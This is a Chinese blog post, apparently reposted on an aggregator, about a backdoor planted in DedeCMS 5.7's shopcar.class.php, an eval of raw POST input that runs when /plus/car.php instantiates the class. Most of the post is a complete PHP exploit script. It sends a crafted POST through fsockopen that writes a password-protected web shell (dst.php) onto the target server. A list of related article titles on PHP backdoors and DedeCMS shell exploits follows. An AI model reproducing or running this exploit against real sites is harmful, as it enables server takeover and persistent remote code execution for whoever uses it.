dedecms 5.7 一句话后门利用 exp
来源:互联网 发布:mac 查看隐藏文件 编辑:程序博客网 时间:2024/05/16 06:09
http://www.wooyun.org/bug.php?action=view&id=5416
shopcar.class.php 被植入一句话
@eval(file_get_contents('php://input'));
去官网下了一套回来,看了下代码,
class MemberShops{ var $OrdersId; var $productsId; function __construct() { $this->OrdersId = $this->getCookie("OrdersId"); if(empty($this->OrdersId)) { $this->OrdersId = $this->MakeOrders(); } @eval(file_get_contents('php://input')); } function MemberShops() { $this->__construct(); }
shopcar.class.php 文件中只有一个 MemberShops 类,构造函数里面出现了后门,当类被实例化的时候就会自动执行构造函数,程序猿你懂的。。。
eval 执行和 file_get_contents 获取内容不用说了,php://input 这个是输入流,接收的是 post 内容,但是 post 类型不能为 multipart/form-data
在 eclipse 里搜索 new MemberShops, 找到 /plus/car.php 里面实例化了这个类,
require_once (dirname(__FILE__) . "/../include/common.inc.php");define('_PLUS_TPL_', DEDEROOT.'/templets/plus');require_once(DEDEINC.'/dedetemplate.class.php');require_once DEDEINC.'/shopcar.class.php';require_once DEDEINC.'/memberlogin.class.php';$cart = new MemberShops();
开始的时候写了个简单的表单去测试,发现 php://input 的内容中特殊符号会被 urlencode,很奇怪吧,明明取的是 post,却像 get 一样被编码,既然如此,那就自己构造 post 了,抓个包,用 fsockopen() 函数模拟 post 提交吧,exp 如下:
<?php//author:舞林//date : 2012-03-21 00:31:05//shell一句话地址,/plus/dst.php 密码cmd//www.t.com/dede/plus/car.phperror_reporting(E_ERROR);set_time_limit(0);$url = 'www.t.com'; //目标站url$dir = '/dede'; //dedecms安装目录//$content = '$a=${@phpinfo()};';$content = '$a=${@file_put_contents("dst.php","<?php eval(\$_POST[cmd]); ?>")};';$data = "POST $dir/plus/car.php HTTP/1.1\r\n";$data .= "Host: localhost\r\n";$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";$data .= "Content-Length: ".strlen($content)."\r\n\r\n";$data .= $content."\r\n";$socket=fsockopen($url,'80');if ($socket) { fwrite($socket,$data); while (!feof($socket)) { $exp.=fgets($socket, 1024); } echo $exp;}else{ echo 'socket err';}?>
- dedecms 5.7 一句话后门利用 exp
- dedecms 5.7 一句话后门利用 exp
- DEDECMS 5.7 后门 exp再修改版
- PHP一句话后门
- php一句话后门分析
- crontab一句话后门分析
- php 一句话木马、后门
- [通杀]dedecms plus/search.php 注入漏洞利用EXP
- 一句话后门……PHP
- DEDECMS拿SHELL EXP
- DEDECMS拿SHELL EXP
- DEDECMS拿SHELL EXP
- JSP一句话后门--2006-08-03
- 那些强悍的PHP一句话后门
- 那些强悍的PHP一句话后门
- 那些强悍的PHP一句话后门
- 那些强悍的PHP一句话后门
- 那些强悍的PHP一句话后门
- 在线渗透测试工具集合
- 分页技术的使用
- 粒子滤波实现物体跟踪
- linux下的chat程序设计
- 数据绑定表达式(上):.NET发现之旅(一)
- dedecms 5.7 一句话后门利用 exp
- 常用数据结构
- VMware Server Console 安装远程控制工具:VMware Server Console
- Mean Shift算法(CamShift)
- 向量几何在游戏编程中的使用1
- c#远程获取网页内容及乱码问题的解决办法 .
- some records
- 数据绑定表达式(下):.NET发现之旅(二)
- 向量几何在游戏编程中的使用2